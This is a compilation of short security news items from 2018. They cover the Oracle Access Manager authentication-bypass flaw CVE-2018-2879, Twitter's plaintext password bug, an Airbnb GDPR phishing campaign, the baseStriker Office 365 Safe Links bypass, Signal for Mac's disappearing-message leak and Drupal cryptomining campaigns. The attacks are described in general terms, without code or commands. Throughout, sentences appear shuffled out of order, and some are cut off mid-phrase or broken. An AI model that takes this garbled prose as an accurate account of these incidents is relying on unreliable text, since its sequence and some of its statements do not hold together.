CVE-2018-2879 – Vulnerability in Oracle Access Manager can let attackers impersonate any user account
Security researcher Wolfgang Ettlinger from SEC Consult Vulnerability Lab has discovered a security vulnerability in Oracle Access Manager that can be exploited by a remote attacker to bypass the authentication and take over the account of any user or administrator on affected systems. ” Ettlinger explained that an attacker can exploit a vulnerability in the way OAM handles encrypted messages to trick the software into accidentally disclosing information that can be used to log in impersonating other users. The flaw, tracked as CVE-2018-2879, relates a flawed cryptographic format used by the Oracle Access Manager. “What’s more, the session cookie crafting process lets us create a session cookie for an arbitrary username, thus allowing us to impersonate any user known to the OAM. The attacker can power a padding oracle attack to disclose an account’s authorization cookie, he can create a script that generates valid login keys for any desired user, including administrators. ” The following video PoC shows that an attacker can impersonate arbitrary users by triggering the flaw. By exploiting this vulnerability we were able to fabricate arbitrary authentication tokens, allowing us to impersonate any user and effectively break the main functionality of OAM. Oracle Access Management provides Web SSO with MFA, coarse-grained authorization and session management, and standard SAML Federation and OAuth capabilities to enable secure access to mobile applications and external cloud. “The Oracle Access Manager is the component of the Oracle Fusion Middleware that handles authentication for all sorts of web applications,” SEC Consult researcher Wolfgang Ettlinger explained. Oracle Access Management 11g and 12c versions were both affected by the vulnerability.
Australia’s Commonwealth Bank lost 20 Million customer records
According to the Commonwealth Bank representatives, two magnetic data tapes were lost, both stored customers’ records, including names, addresses, account numbers and transaction details from 2000 to 2016. ” The Commonwealth Bank is continuing to monitor the accounts of the affected customers providing them full coverage against frauds and other fraudulent activities. “We take the protection of customer data very seriously and incidents like this are not acceptable,” announced Angus Sullivan, acting group executive for the lender’s retail banking services. The sub-contractor did not provide the bank with the documentation to confirm this the disruption of the magnetic data tapes, anyway the bank tried to downplay the situation confirming that the records don’t include passwords, PINs or other financial or sensitive information. According to an independent forensic investigation conducted in 2016, “the most likely scenario was the tapes had been disposed of,” anyway it was not a data breach and banking systems were not compromised by attackers. According to the broadcaster ABC, the data were supposed to have been destroyed when a sub-contractor after the dismantled a data centre. “We also put in place heightened monitoring of customer accounts to ensure no data compromise had occurred. “Maintaining data security is of vital importance for everybody, whether it’s the private sector or governments and if there is a serious data breach or loss, the people affected should be advised so they can take steps to protect themselves,” he said. “We concluded, given the results of the investigation, that we would not alert customers. “The relevant regulators were notified in 2016 and we undertook a thorough forensic investigation, providing further updates to our regulators after its completion,” said Sullivan.
Twitter urges its 330 million users to change passwords after bug exposed them in plain text
Twitter is urging its users to immediately change their passwords after a glitch caused some of them to be stored in plain text. The company did not reveal the number of affected accounts, according to the Reuters a person familiar with the company’s response said the number was “substantial.” The bad news is that passwords may have been exposed for “several months.” More than 330 million users have been impacted, according to the company data were stored in plain text only on an internal system. “We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone.” reads the security advisory published by the company. “Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password,” Twitter announced it had fixed the security glitch and started an internal investigation to verify if users’ data may have been abused by insiders. The company discovered the flaw a few weeks ago and already reported the issue to some regulators, the bug caused the passwords to be written in plain text on an internal computer log before the hashing process was completed. “Due to a bug, passwords were written to an internal log before completing the hashing process. We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again.” continues the advisory. Just after the announcement of the incident, Twitter’s share price drop 1 percent in extended trade at $30.35, after gaining 0.4 percent during the session. Twitter apologizes its users and asks its users to change passwords and enable two-factor authentication service. Of course change passwords for all the sites where you have used the same Twitter credentials. This is the last blatant disclosure of a security breach a few weeks before the introduction of the EU General Data Protection Regulation, a couple of days ago, GitHub announced to have suffered a similar incident.
Phishing campaign aimed at Airbnb users leverages GDPR as a bait
Experts from Redscan are monitoring a spam campaign targeting Airbnb users with spam messages like the following one: “This update is mandatory because of the new changes in the EU Digital privacy legislation that acts upon United States-based companies, like Airbnb in order to protect European citizens and companies,” reads the spam message according to the Redscan. If the victims click the malicious link embedded in the email, they redirected to phishing page designed to request victims both personal and financial information. The phishing emails use a simple as effective social engineering trick, the message informs hosts they can’t accept new bookings or contact potential guests until they accept their organizations are not compliance to the GDPR. Airbnb, like many other companies, is sending emails to inform users of changes in the privacy law according to the upcoming GDPR. Cybercriminals are targeting Airbnb users demanding personal information and financial data referencing the GDPR. “Modern phishing campaigns are becoming increasingly difficult to spot and people need to be extra vigilant when opening emails and clicking links since it’s important to ensure they originate from a trusted source. The upcoming General Data Protection Regulation (GDPR) privacy laws threaten with severe penalties to demand personal information from Airbnb users. Malicious email uses a domain that could appear as legitimate, according to Redscan, in this campaign, hackers rather than the legitimate @airbnb. “The irony won’t be lost on anyone that cybercriminals are exploiting the arrival of new data protection regulations to steal people’s data,” Skynews cited Redscan Director of Cybersecurity Mark Nicholls Nicholls as saying.
The Pentagon bans Huawei and ZTE phones from stores on military bases
The alert was issued by the National Cyber Security Centre that said the Chinese firm “would present a risk to UK national security that could not be mitigated effectively or practicably”. ZTE did not immediately comment the ban, while Huawei promptly replied by highlighting high quality of its products and their reliability in term of security. “Chinese cyber espionage and cyber attack capabilities will continue to support China’s national security and economic priorities,” Coats told the Senate Intelligence Committee. The Pentagon considers the security risk posed by the adoption of the devices manufactured by the Chinese firms unacceptable, US officials believe the smartphones could be used to spy on military personnel. Department of Commerce’s Bureau of Industry and Security (BIS) announced that Chinese firm has been banned from purchasing goods from US companies. In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, invited Americans to avoid buying Huawei and ZTE products. The Federal Communications Commission also ban federal funds from being spent on wireless equipment made by companies that pose a security risk to the US infrastructure. “Given security concerns about ZTE cell phones and related products, the (Pentagon’s) exchange services also removed ZTE products from their stores,” he added. ” Eastburn confirmed that the decision to ban the Huawei phones and related products was taken on April 25. In April, the UK GCHQ intelligence agency warned UK telcos firms of the risks of using ZTE equipment and services for their infrastructure.
Over 10,000 companies downloading software vulnerable to Equifax hack
Even after the massive data breach allowed hackers to steal the personal information of 148 million Equifax customers, thousands of companies are still using the software that made the breach possible. According to Fortune, Maryland-based cybersecurity firm Sonatype identified as many as 10,801 organizations that have downloaded an old version of Apache Struts — the same free, open-source software that hackers exploited to swipe the names, social security numbers, birthdays, addresses, and other identifiers from Equifax’s databases. Of the organizations that downloaded the vulnerable version of the software, seven of the businesses were Fortune Global 100 tech companies, eight were Fortune Global 100 automakers, and 15 were Fortune Global 100 financial services or insurance firms, according to Fortune. The Apache Software Foundation has released seven patched versions of the software since March 2017. Apache Struts is used as an app building tool, and usually as a framework for online payment systems. According to ZDNet, over half of the Fortune Global 100 companies are using the vulnerable version of Apache Struts. The Equifax breach led to probes by members of Congress, and the resignation of former chief executive Richard Smith. The company was accused of not updating its computer systems and withholding information about the extent of the breach.
Hackers Found Using A New Way to Bypass Microsoft Office 365 Safe Links
BaseStriker attack involves using the tag in the header of an HTML email—which is used to defines a default base URI, or URL, for relative links in a document or web page. However, researchers at cloud security company Avanan have revealed how attackers have been bypassing the Safe Links feature by using a technique called, “baseStriker attack. the researchers compared HTML code of a traditional phishing email with the one that uses a tag to split up the malicious link in a way that Safe Links fails to identify and replace the partial hyperlink, eventually redirecting victims to the phishing site when clicked. Security researchers revealed a way around that some hacking groups have been found using in the wild to bypass a security feature of Microsoft Office 365, which is originally designed to protect users from malware and phishing attacks. So far, researchers have only seen hackers using the baseStriker attack to send phishing emails, but they believe the attack can be leveraged to distribute ransomware, malware and other malicious software. Dubbed Safe Links, the feature has been included in Office 365 software as part of Microsoft’s Advanced Threat Protection (ATP) solution that works by replacing all URLs in an incoming email with Microsoft-owned secure URLs. So, every time a user clicks on a link provided in an email, it first sends the user to a Microsoft owned domain, where the company immediately checks the original URL for anything suspicious. The researchers tested the baseStriker attack against several configurations and found that “anyone using Office 365 in any configuration is vulnerable,” be it web-based client, mobile app or desktop application of OutLook. In other words, if the URL is defined, then all subsequent relative links will use that URL as a starting point. If Microsoft’s scanners detect any malicious element, it then warns users about it, and if not, it redirects the user to the original link.
Self-destructing messages received on ‘Signal for Mac’ can be recovered later
It turns out that macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing(self-destructing) messages from the recipient’s system, leaving the content of your sensitive messages at risk of getting exposed. For those unaware, the disappearing messages in Signal self-destruct after a particular duration set by the sender, leaving no trace of it on the receiver’s device or Signal servers. However, security researcher Alec Muffett noticed that the messages that are supposed to be “disappearing” can still be seen—even if they are deleted from the app. Another security researcher Patrick Wardle reproduced the issue and explained that macOS makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS’s Notification Center, from where they can be recovered anytime later. If you want to keep an on your incoming messages without having to check your inbox obsessively, macOS desktop notifications (banners and alerts) that appear in the upper-right corner of your screen is a great way to alert you of things you don’t want to miss. According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message). Now, sharing incoming disappearing messages with the notification system leads to two privacy issues: “Disappearing” messages may remain in the User Interface of macOS Notification Center even after being deleted within the Signal app and can be seen in the notification bar until manually closed by the user. In the backend, the SQLite database of Notification Center also keeps a copy of truncated messages, which can be accessed with normal user permissions, or by a malicious app installed on the system. Wardle suggests either Signal should not provide notifications service for disappearing messages or should explicitly delete such notifications from the system’s database when it removes the messages from the app UI. Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker or your wife can recover them, you should consider disabling notifications service until Signal patches this issue.
Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
It has been estimated that potentially over one million Drupal websites are vulnerable to cyber attacks exploiting the two flaws if the security patches are not installed. ” During the inspection of the attacks blocked by our systems, we came across the “Kitty” malware, an advanced Monero cryptocurrency miner, utilizing a “webminerpool”, an open source mining software for browsers” The attackers used an in-browser cryptocurrency miner inside a file named “me0w. ” No doubts, the attackers will continue to attempt the exploitation of both Drupal flaws in the next weeks, for this reason, it is essential to apply the necessary updates. The experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw. Security researchers from Imperva also found a malware campaign targeting Drupal websites tracked as “Kitty” campaign. According to Imperva, the Monero address used in the Kitty campaign is the same used in other attacks on servers running vBulletin 4. The hackers started using the exploits for the above vulnerabilities to compromise drupal installs, mostly cryptocurrency mining. “While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. Now, a growing number of malware campaigns is targeting Drupal installs, one of them was recently discovered by the security researcher Troy Mursch. A week after the release of the security update for the CVE-2018-7600 flaw, a proof-of-concept (PoC) exploit was publicly disclosed.